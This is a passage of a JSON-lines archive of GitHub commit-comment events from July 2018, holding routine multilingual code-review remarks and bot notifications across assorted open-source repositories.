`call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1957:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `block in call'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1728:in `synchronize'\n/app/vendor/bundle/ruby/2.3.0/gems/sinatra-2.0.1/lib/sinatra/base.rb:1501:in `call'\n/app/vendor/bundle/ruby/2.3.0/gems/rack-2.0.5/lib/rack/handler/webrick.rb:86:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:140:in `service'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/httpserver.rb:96:in `run'\n/app/vendor/ruby-2.3.3/lib/ruby/2.3.0/webrick/server.rb:296:in `block in start_thread'\n```"}},"created_at":"2018-07-23T11:01:38Z"}
{"id":"8003191007","type":"CommitCommentEvent","actor":{"login":"srhb"},"repo":{"name":"johanot/nixpkgs"},"payload":{"comment":{"id":29798706,"position":49,"line":49,"path":"nixos/modules/services/cluster/kubernetes/apiserver.nix","commit_id":"5b84e39555d0bddca19867928d18507774b9930d","created_at":"2018-07-23T11:02:05Z","updated_at":"2018-07-23T11:02:05Z","author_association":"NONE","body":"`listOf attrs` but description says \"authorization police *file*\" which is confusing."}},"created_at":"2018-07-23T11:02:05Z"}
{"id":"8003191240","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/shopelectro"},"payload":{"comment":{"id":29798707,"position":null,"line":null,"path":null,"commit_id":"d73b4f73cda5742d6c7bd0537d753a4bd80ce5b9","created_at":"2018-07-23T11:02:08Z","updated_at":"2018-07-23T11:02:08Z","author_association":"COLLABORATOR","body":"Puzzle `360-25169cf6` disappeared from [`shopelectro/tests/tests_views.py`](https://github.com/fidals/shopelectro/blob/master/shopelectro/tests/tests_views.py), that's why I closed #407. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-23T11:02:08Z"}
{"id":"8003192667","type":"CommitCommentEvent","actor":{"login":"Andrej7508"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29798710,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T11:02:27Z","updated_at":"2018-07-23T11:02:27Z","author_association":"NONE","body":"I like it!!!"}},"created_at":"2018-07-23T11:02:27Z"}
{"id":"8003197575","type":"CommitCommentEvent","actor":{"login":"srhb"},"repo":{"name":"johanot/nixpkgs"},"payload":{"comment":{"id":29798721,"position":133,"line":133,"path":"nixos/modules/services/cluster/kubernetes/apiserver.nix","commit_id":"5b84e39555d0bddca19867928d18507774b9930d","created_at":"2018-07-23T11:03:35Z","updated_at":"2018-07-23T11:03:35Z","author_association":"NONE","body":"This seems to be self-referential. Something clever going on that I don't understand?"}},"created_at":"2018-07-23T11:03:35Z"}
{"id":"8003199189","type":"CommitCommentEvent","actor":{"login":"srhb"},"repo":{"name":"johanot/nixpkgs"},"payload":{"comment":{"id":29798728,"position":128,"line":128,"path":"nixos/modules/services/cluster/kubernetes/apiserver.nix","commit_id":"5b84e39555d0bddca19867928d18507774b9930d","created_at":"2018-07-23T11:03:58Z","updated_at":"2018-07-23T11:03:58Z","author_association":"NONE","body":"This would probably be a lot nicer as a list of strs."}},"created_at":"2018-07-23T11:03:58Z"}
{"id":"8003200495","type":"CommitCommentEvent","actor":{"login":"ccg116"},"repo":{"name":"ImperialCollegeLondon/xena-UROP-2018"},"payload":{"comment":{"id":29798732,"position":null,"line":null,"path":null,"commit_id":"f17626b3667a8ad54e329bf8df4df751258a933a","created_at":"2018-07-23T11:04:15Z","updated_at":"2018-07-23T11:04:15Z","author_association":"COLLABORATOR","body":"wrote skeleton of sheet 3 and sheet 4"}},"created_at":"2018-07-23T11:04:15Z"}
{"id":"8003209560","type":"CommitCommentEvent","actor":{"login":"tjorim"},"repo":{"name":"tjorim/home-assistant.io"},"payload":{"comment":{"id":29798748,"position":null,"line":null,"path":null,"commit_id":"e0660a42bdca23169db66f4599f5624627160c26","created_at":"2018-07-23T11:06:19Z","updated_at":"2018-07-23T11:06:19Z","author_association":"OWNER","body":"Meant light.insteon_hub ofcourse."}},"created_at":"2018-07-23T11:06:19Z"}
{"id":"8003209993","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29798749,"position":null,"line":null,"path":null,"commit_id":"982dc1466e51c512218af60afe681d0008d62179","created_at":"2018-07-23T11:06:25Z","updated_at":"2018-07-23T11:06:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-36](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-36).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-36-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-23T11:06:25Z"}
{"id":"8003219599","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/anpy"},"payload":{"comment":{"id":29798761,"position":5,"line":37,"path":"anpy/dossier_like_senapy.py","commit_id":"5ac7481ea551fcec0d5185ae4d5f0ce474c85634","created_at":"2018-07-23T11:08:32Z","updated_at":"2018-07-23T11:08:32Z","author_association":"CONTRIBUTOR","body":"ne faudrait-il pas le faire que si url ne contenait pas déjà '/dyn/' ? (cas de non redirection)"}},"created_at":"2018-07-23T11:08:32Z"}
{"id":"8003219959","type":"CommitCommentEvent","actor":{"login":"dominichamon"},"repo":{"name":"google/benchmark"},"payload":{"comment":{"id":29798762,"position":null,"line":null,"path":null,"commit_id":"a6a1b0d765b116bb9c777d45a299ae84a2760981","created_at":"2018-07-23T11:08:38Z","updated_at":"2018-07-23T11:08:38Z","author_association":"MEMBER","body":"I'm sympathetic to the error, but i'm not sure the benchmark library is the place to educate people on the various subtleties of package management in the python world.\r\n\r\nHaving said that, https://github.com/google/benchmark/commit/63e183b38945a0d67671f94bd3f74d7ffb6f5a82"}},"created_at":"2018-07-23T11:08:38Z"}
{"id":"8003221505","type":"CommitCommentEvent","actor":{"login":"pauleve"},"repo":{"name":"colomoto/colomoto-conda"},"payload":{"comment":{"id":29798764,"position":null,"line":null,"path":null,"commit_id":"8232db2c1ec610bf42f2209b0ee647f2a118b656","created_at":"2018-07-23T11:08:59Z","updated_at":"2018-07-23T11:08:59Z","author_association":"CONTRIBUTOR","body":"@aurelien-naldi can you upload the updated conda ginsim package on anaconda as well?"}},"created_at":"2018-07-23T11:08:59Z"}
{"id":"8003222199","type":"CommitCommentEvent","actor":{"login":"catmorales"},"repo":{"name":"georchestra/georchestra"},"payload":{"comment":{"id":29798767,"position":null,"line":null,"path":null,"commit_id":"19a4faf28a70cd2e8fd63ceeafb45ca1a0b1cfb9","created_at":"2018-07-23T11:09:08Z","updated_at":"2018-07-23T11:09:08Z","author_association":"NONE","body":"thank you !\r\n"}},"created_at":"2018-07-23T11:09:08Z"}
{"id":"8003222363","type":"CommitCommentEvent","actor":{"login":"barankaplan7878"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29798768,"position":null,"line":null,"path":null,"commit_id":"dfe69d81c212f2c36817ddfc326a16283842d3ea","created_at":"2018-07-23T11:09:10Z","updated_at":"2018-07-23T11:09:10Z","author_association":"NONE","body":"Thank you so much but I can't test it now because I can't open any forge server. I don't know why."}},"created_at":"2018-07-23T11:09:10Z"}
{"id":"8003223702","type":"CommitCommentEvent","actor":{"login":"killercup"},"repo":{"name":"killercup/cargo-edit"},"payload":{"comment":{"id":29798769,"position":null,"line":null,"path":null,"commit_id":"95aa7e61f054c9d073a5fb1d0395363755cde97f","created_at":"2018-07-23T11:09:29Z","updated_at":"2018-07-23T11:09:29Z","author_association":"OWNER","body":"```\r\n> date\r\nMon Jul 23 13:08:15 CEST 2018\r\n```\r\n\r\nWhat timezone are you in? ([Travis is in mine luckily](https://travis-ci.org/rust-clique/clap-md/builds/407092844))"}},"created_at":"2018-07-23T11:09:29Z"}
{"id":"8003225715","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798771,"position":3,"line":3,"path":"app/models/booking.rb","commit_id":"d4f2f10aeeb7a7f64bc2c327f71e6361bbb4a17d","created_at":"2018-07-23T11:09:57Z","updated_at":"2018-07-23T11:09:57Z","author_association":"NONE","body":"it must be a renter!"}},"created_at":"2018-07-23T11:09:57Z"}
{"id":"8003227323","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/anpy"},"payload":{"comment":{"id":29798772,"position":35,"line":395,"path":"anpy/dossier_like_senapy.py","commit_id":"5ac7481ea551fcec0d5185ae4d5f0ce474c85634","created_at":"2018-07-23T11:10:20Z","updated_at":"2018-07-23T11:10:20Z","author_association":"CONTRIBUTOR","body":"ça ne devrait pas etre resp.url plutôt ici ?"}},"created_at":"2018-07-23T11:10:20Z"}
{"id":"8003230189","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798777,"position":2,"line":2,"path":"app/models/item.rb","commit_id":"d4f2f10aeeb7a7f64bc2c327f71e6361bbb4a17d","created_at":"2018-07-23T11:11:01Z","updated_at":"2018-07-23T11:11:01Z","author_association":"NONE","body":"must be owner"}},"created_at":"2018-07-23T11:11:01Z"}
{"id":"8003230256","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798779,"position":20,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:11:02Z","updated_at":"2018-07-23T11:11:02Z","author_association":"CONTRIBUTOR","body":"Plutôt appeler cette méthode fetchPlanetFleets. Fetch consiste à récupérer une entité par son ID. pour les flottes, ça consisterait à en récupérer une seule par son ID"}},"created_at":"2018-07-23T11:11:02Z"}
{"id":"8003232493","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29798784,"position":null,"line":null,"path":null,"commit_id":"470e3afc9c24aaf541f56e6e584b46999d93a50a","created_at":"2018-07-23T11:11:31Z","updated_at":"2018-07-23T11:11:31Z","author_association":"COLLABORATOR","body":"Puzzle `66-7e85ada8` disappeared from [`node/app.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py), that's why I closed #81. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-23T11:11:31Z"}
{"id":"8003232636","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29798785,"position":null,"line":null,"path":null,"commit_id":"470e3afc9c24aaf541f56e6e584b46999d93a50a","created_at":"2018-07-23T11:11:33Z","updated_at":"2018-07-23T11:11:33Z","author_association":"COLLABORATOR","body":"Puzzle `81-46bd4401` discovered in   [`zln/zln.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/zln/zln.py)   and submitted as #86. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-23T11:11:33Z"}
{"id":"8003232929","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"nss-dev/nss"},"payload":{"comment":{"id":29798787,"position":null,"line":null,"path":null,"commit_id":"0dbf8856942b2d3c2a8d5298f4361134c28ee359","created_at":"2018-07-23T11:11:36Z","updated_at":"2018-07-23T11:11:36Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/github/v1/taskcluster-github-config.json#\nErrors:\n  * data should NOT have additional properties: \"scopes\"\n  * data.metadata.source should be string\n\n</details>"}},"created_at":"2018-07-23T11:11:36Z"}
{"id":"8003233590","type":"CommitCommentEvent","actor":{"login":"ordian"},"repo":{"name":"killercup/cargo-edit"},"payload":{"comment":{"id":29798790,"position":null,"line":null,"path":null,"commit_id":"95aa7e61f054c9d073a5fb1d0395363755cde97f","created_at":"2018-07-23T11:11:44Z","updated_at":"2018-07-23T11:11:44Z","author_association":"COLLABORATOR","body":"I'm in CEST + 1. So rustup only allows installing the latest toolchain now?\r\n```\r\n❯ rustup toolchain install nightly-2018-07-21\r\ninfo: syncing channel updates for 'nightly-2018-07-21-x86_64-unknown-linux-gnu'\r\nerror: no release found for 'nightly-2018-07-21'\r\n```\r\n```\r\n❯ rustup toolchain install nightly-2018-07-22                           \r\ninfo: syncing channel updates for 'nightly-2018-07-22-x86_64-unknown-linux-gnu'\r\n281.8 KiB / 281.8 KiB (100 %) 218.9 KiB/s ETA:   0 s                \r\n```"}},"created_at":"2018-07-23T11:11:44Z"}
{"id":"8003235466","type":"CommitCommentEvent","actor":{"login":"modulesio"},"repo":{"name":"webmixedreality/webmr-docs"},"payload":{"comment":{"id":29798794,"position":5,"line":8,"path":"docs/Support.md","commit_id":"ffc8b3c44b7a9e38723e1a465860ecf8d133f0a3","created_at":"2018-07-23T11:12:07Z","updated_at":"2018-07-23T11:12:07Z","author_association":"MEMBER","body":"I like the term \"Exospace\" but it's probably going to be confusing. There might be a place for it but I don't think it's the right tone for docs 🤔."}},"created_at":"2018-07-23T11:12:07Z"}
{"id":"8003235525","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798795,"position":58,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:12:08Z","updated_at":"2018-07-23T11:12:08Z","author_association":"CONTRIBUTOR","body":"La variable intermédiaire n'est pas nécessaire si elle n'est utilisée qu'une fois "}},"created_at":"2018-07-23T11:12:08Z"}
{"id":"8003240921","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"MahjongRepository/mahjong-portal"},"payload":{"comment":{"id":29798800,"position":1,"line":1,"path":"server/rating/calculation/coefficients.py","commit_id":"c61e971dfe67e43a41b5d410a7fc16253b4415d5","created_at":"2018-07-23T11:13:14Z","updated_at":"2018-07-23T11:13:14Z","author_association":"COLLABORATOR","body":"Прям назвал бы файл \"hardcoded_coefficients.py\"."}},"created_at":"2018-07-23T11:13:14Z"}
{"id":"8003242450","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"MahjongRepository/mahjong-portal"},"payload":{"comment":{"id":29798801,"position":14,"line":75,"path":"server/rating/calculation/rr.py","commit_id":"c61e971dfe67e43a41b5d410a7fc16253b4415d5","created_at":"2018-07-23T11:13:36Z","updated_at":"2018-07-23T11:13:36Z","author_association":"COLLABORATOR","body":"предлагаю id=307 сделать константой в hardcoded_coefficients.py"}},"created_at":"2018-07-23T11:13:36Z"}
{"id":"8003244689","type":"CommitCommentEvent","actor":{"login":"nilam1988"},"repo":{"name":"nilam1988/Hello-wold"},"payload":{"comment":{"id":29798807,"position":null,"line":null,"path":null,"commit_id":"d511d70f6effcf4cf1b383ca1e1b9faa49eaf1d3","created_at":"2018-07-23T11:14:08Z","updated_at":"2018-07-23T11:14:08Z","author_association":"OWNER","body":"This is basic C program"}},"created_at":"2018-07-23T11:14:08Z"}
{"id":"8003245362","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"MahjongRepository/mahjong-portal"},"payload":{"comment":{"id":29798808,"position":16,"line":77,"path":"server/rating/calculation/rr.py","commit_id":"c61e971dfe67e43a41b5d410a7fc16253b4415d5","created_at":"2018-07-23T11:14:17Z","updated_at":"2018-07-23T11:14:17Z","author_association":"COLLABORATOR","body":"я это тоже - понимаю, что хардкод, но стоит его весь в одном файле сконцентрировать"}},"created_at":"2018-07-23T11:14:17Z"}
{"id":"8003248963","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798818,"position":2,"line":2,"path":"app/models/user.rb","commit_id":"d4f2f10aeeb7a7f64bc2c327f71e6361bbb4a17d","created_at":"2018-07-23T11:15:07Z","updated_at":"2018-07-23T11:15:07Z","author_association":"NONE","body":"add `foreign_key`"}},"created_at":"2018-07-23T11:15:07Z"}
{"id":"8003248980","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798819,"position":69,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:15:08Z","updated_at":"2018-07-23T11:15:08Z","author_association":"CONTRIBUTOR","body":"Même réflexion qu'à Liador: aérez vos codes. Met des espaces entre la parenthèse fermante, la flèche et l'accolade ouvrante. "}},"created_at":"2018-07-23T11:15:08Z"}
{"id":"8003250188","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798825,"position":3,"line":3,"path":"app/models/user.rb","commit_id":"d4f2f10aeeb7a7f64bc2c327f71e6361bbb4a17d","created_at":"2018-07-23T11:15:23Z","updated_at":"2018-07-23T11:15:23Z","author_association":"NONE","body":"add also `received_reviews`"}},"created_at":"2018-07-23T11:15:23Z"}
{"id":"8003250308","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798826,"position":69,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:15:25Z","updated_at":"2018-07-23T11:15:25Z","author_association":"CONTRIBUTOR","body":"A corriger aussi sur les autres fonctions "}},"created_at":"2018-07-23T11:15:25Z"}
{"id":"8003250833","type":"CommitCommentEvent","actor":{"login":"bogachev-pa"},"repo":{"name":"MahjongRepository/mahjong-portal"},"payload":{"comment":{"id":29798827,"position":5,"line":156,"path":"server/tournament/models.py","commit_id":"c61e971dfe67e43a41b5d410a7fc16253b4415d5","created_at":"2018-07-23T11:15:33Z","updated_at":"2018-07-23T11:15:33Z","author_association":"COLLABORATOR","body":"см. выше про хардкод"}},"created_at":"2018-07-23T11:15:33Z"}
{"id":"8003255710","type":"CommitCommentEvent","actor":{"login":"nsamsono"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29798834,"position":40,"line":87,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-23T11:16:39Z","updated_at":"2018-07-23T11:16:39Z","author_association":"NONE","body":"Very good. But still, can you please split it to two separate patches?\r\n1. Adding match callbacks\r\n2. Adding statistics"}},"created_at":"2018-07-23T11:16:39Z"}
{"id":"8003256794","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798837,"position":63,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:16:55Z","updated_at":"2018-07-23T11:16:55Z","author_association":"CONTRIBUTOR","body":"Il est nécessaire de mettre des points virgules après la déclaration d'une constante contenant une fonction. Javascript permet de ne pas le faire mais perd en performance pour pouvoir le placer lui même. Autant le placer direct !"}},"created_at":"2018-07-23T11:16:55Z"}
{"id":"8003258217","type":"CommitCommentEvent","actor":{"login":"JonasNilson"},"repo":{"name":"D-Kalashnikov/idle_master_extended"},"payload":{"comment":{"id":29798840,"position":null,"line":null,"path":null,"commit_id":"8f19e9eb03d2b829dcea43ce06fda9f7c85bbd31","created_at":"2018-07-23T11:17:14Z","updated_at":"2018-07-23T11:17:14Z","author_association":"NONE","body":"@D-Kalashnikov Looks like I missed that one in my update... Does **loginCookie** equal **cookies[\"steamLoginSecure]**?"}},"created_at":"2018-07-23T11:17:14Z"}
{"id":"8003267633","type":"CommitCommentEvent","actor":{"login":"leofeyer"},"repo":{"name":"contao/core-bundle"},"payload":{"comment":{"id":29798860,"position":null,"line":null,"path":null,"commit_id":"296ab0ebb18ba93ca4de3907dcab7458ae29fecc","created_at":"2018-07-23T11:19:27Z","updated_at":"2018-07-23T11:19:27Z","author_association":"MEMBER","body":"Doch, ich denke schon: https://3v4l.org/DrSNs"}},"created_at":"2018-07-23T11:19:27Z"}
{"id":"8003268291","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798861,"position":26,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:19:36Z","updated_at":"2018-07-23T11:19:36Z","author_association":"CONTRIBUTOR","body":"Quand tu fais des grosses portions de code imbriquées dans un if qui n'a pas de else ou bien un petit, il est mieux de sortir ce code du if, d'inverser la condition et de faire un return à la fin du code qui a été mis dans le if. En l'occurrence ce sera le contenu de ton else qui devient le contenu du if inversé, avec un return à la fin. Du coup le gros de ton code à un niveau d'indentation en moins, ce qui est plus lisible "}},"created_at":"2018-07-23T11:19:36Z"}
{"id":"8003271180","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29798870,"position":null,"line":null,"path":null,"commit_id":"6e1c718da18db62003a25a9b4e9d108788714b6c","created_at":"2018-07-23T11:20:16Z","updated_at":"2018-07-23T11:20:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-36](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-36).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-36-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-23T11:20:16Z"}
{"id":"8003276237","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798877,"position":32,"line":null,"path":"static/js/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:21:26Z","updated_at":"2018-07-23T11:21:26Z","author_association":"CONTRIBUTOR","body":"Je pense que ça c'est quelque chose qui devrait être plutôt côté back. Tu ne récupères pas de flottes dont la location est null ça voudrait dire que ces flottes ne sont pas sur la planète et donc que ce que renvoie ton webservice est faux "}},"created_at":"2018-07-23T11:21:26Z"}
{"id":"8003279918","type":"CommitCommentEvent","actor":{"login":"pkubaj"},"repo":{"name":"HardenedBSD/hardenedbsd-ports"},"payload":{"comment":{"id":29798882,"position":null,"line":null,"path":null,"commit_id":"0304ca8b463c9a5efe4a22111ff4febfcf84728c","created_at":"2018-07-23T11:22:18Z","updated_at":"2018-07-23T11:22:18Z","author_association":"MEMBER","body":"Done.\r\nhttps://github.com/HardenedBSD/hardenedbsd-ports/issues/153"}},"created_at":"2018-07-23T11:22:18Z"}
{"id":"8003281825","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798884,"position":15,"line":null,"path":"static/js/model/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:22:46Z","updated_at":"2018-07-23T11:22:46Z","author_association":"CONTRIBUTOR","body":"J'aurais plutôt appelé ça fetchPlayerFleets pour ne pas introduire de confusions. La on dirait que tu récupères toutes les flottes de tout le monde "}},"created_at":"2018-07-23T11:22:46Z"}
{"id":"8003285120","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798893,"position":30,"line":null,"path":"static/js/model/fleet.js","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:23:32Z","updated_at":"2018-07-23T11:23:32Z","author_association":"CONTRIBUTOR","body":"fetchPlanetFleets"}},"created_at":"2018-07-23T11:23:32Z"}
{"id":"8003287094","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-front"},"payload":{"comment":{"id":29798896,"position":12,"line":null,"path":"static/translations/fr.json","commit_id":"bf4a6157f9b16fe479821d709b6392264177edd3","created_at":"2018-07-23T11:24:00Z","updated_at":"2018-07-23T11:24:00Z","author_association":"CONTRIBUTOR","body":"Faute de frappe"}},"created_at":"2018-07-23T11:24:00Z"}
{"id":"8003287425","type":"CommitCommentEvent","actor":{"login":"D-Kalashnikov"},"repo":{"name":"D-Kalashnikov/idle_master_extended"},"payload":{"comment":{"id":29798898,"position":null,"line":null,"path":null,"commit_id":"8f19e9eb03d2b829dcea43ce06fda9f7c85bbd31","created_at":"2018-07-23T11:24:04Z","updated_at":"2018-07-23T11:24:04Z","author_association":"OWNER","body":"Oh sorry Jonas, im a dummie in c#, i just trying to fix a old bug with this\nchange that i see in the original project.\n\nIf this possible, look for the badge pages didn't read.\n\nA hug for you!\n\nEm seg, 23 de jul de 2018 08:17, Jonas Nilson <notifications@github.com>\nescreveu:\n\n> @D-Kalashnikov <https://github.com/D-Kalashnikov> Looks like I missed\n> that one in my update... Does *loginCookie* equal\n> *cookies[\"steamLoginSecure]*?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/D-Kalashnikov/idle_master_extended/commit/8f19e9eb03d2b829dcea43ce06fda9f7c85bbd31#commitcomment-29798840>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnUyx8LN4OdyL7XDBXLup_qthsLQJKElks5uJbC6gaJpZM4Vaz0M>\n> .\n>\n"}},"created_at":"2018-07-23T11:24:04Z"}
{"id":"8003310158","type":"CommitCommentEvent","actor":{"login":"JonasNilson"},"repo":{"name":"D-Kalashnikov/idle_master_extended"},"payload":{"comment":{"id":29798951,"position":null,"line":null,"path":null,"commit_id":"8f19e9eb03d2b829dcea43ce06fda9f7c85bbd31","created_at":"2018-07-23T11:29:19Z","updated_at":"2018-07-23T11:29:19Z","author_association":"NONE","body":"No need to be sorry, all help is appreciated. \r\n\r\nCan you describe the bug in more detail? And how can I reproduce it myself?\r\n\r\nIf you fix it you can always send a pull request here on GitHub."}},"created_at":"2018-07-23T11:29:19Z"}
{"id":"8003312189","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29798959,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-23T11:29:48Z","updated_at":"2018-07-23T11:29:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T11:29:48Z"}
{"id":"8003322442","type":"CommitCommentEvent","actor":{"login":"OlivierHartmann"},"repo":{"name":"kouchy/teeworlds"},"payload":{"comment":{"id":29798987,"position":null,"line":null,"path":null,"commit_id":"169564cec1fefbc47dfc0294f56bfcc176b684dd","created_at":"2018-07-23T11:32:08Z","updated_at":"2018-07-23T11:32:08Z","author_association":"COLLABORATOR","body":"Salut Léo,\r\n\r\nIntéressante statistique que tu as ajoutée là. Pour te donner une idée, voici ce que ça donne : http://teeworlds.potionmagic.eu/stats/daily/stats_20180723_csn7.json\r\nJ'imagine que le but est d'en faire une map des localisations des death par joueur (on peut également le faire pour les kills par joueur d'ailleurs).\r\n\r\nTu peux remarquer que ça prends beaucoup de place très rapidement. J'ai peur que les fichiers deviennent vites beaucoup trop gros pour être traités efficacement par l'interface web et même à être dumpé par le parser. Il faudrait peut être trouvé un autre moyen de stocker cette info.\r\n\r\n@+"}},"created_at":"2018-07-23T11:32:08Z"}
{"id":"8003325828","type":"CommitCommentEvent","actor":{"login":"filipekiss"},"repo":{"name":"filipekiss/zdotdir"},"payload":{"comment":{"id":29798993,"position":null,"line":null,"path":null,"commit_id":"e5841f91803b43aa6dd7291de778332d7cc38e06","created_at":"2018-07-23T11:32:52Z","updated_at":"2018-07-23T11:32:52Z","author_association":"OWNER","body":"It  will work fine without regex. The main difference is that EVERY alias will be expanded and using the regex only the aliases contained in the `ealiases` array will be expanded. \r\n\r\nAs to why the regex is giving you an error, I'm not really sure. The only repetition-operator there is the `*` and it should not be a problem. Which version of zsh you're using? Mine is `zsh 5.5.1 (x86_64-apple-darwin17.5.0)`"}},"created_at":"2018-07-23T11:32:52Z"}
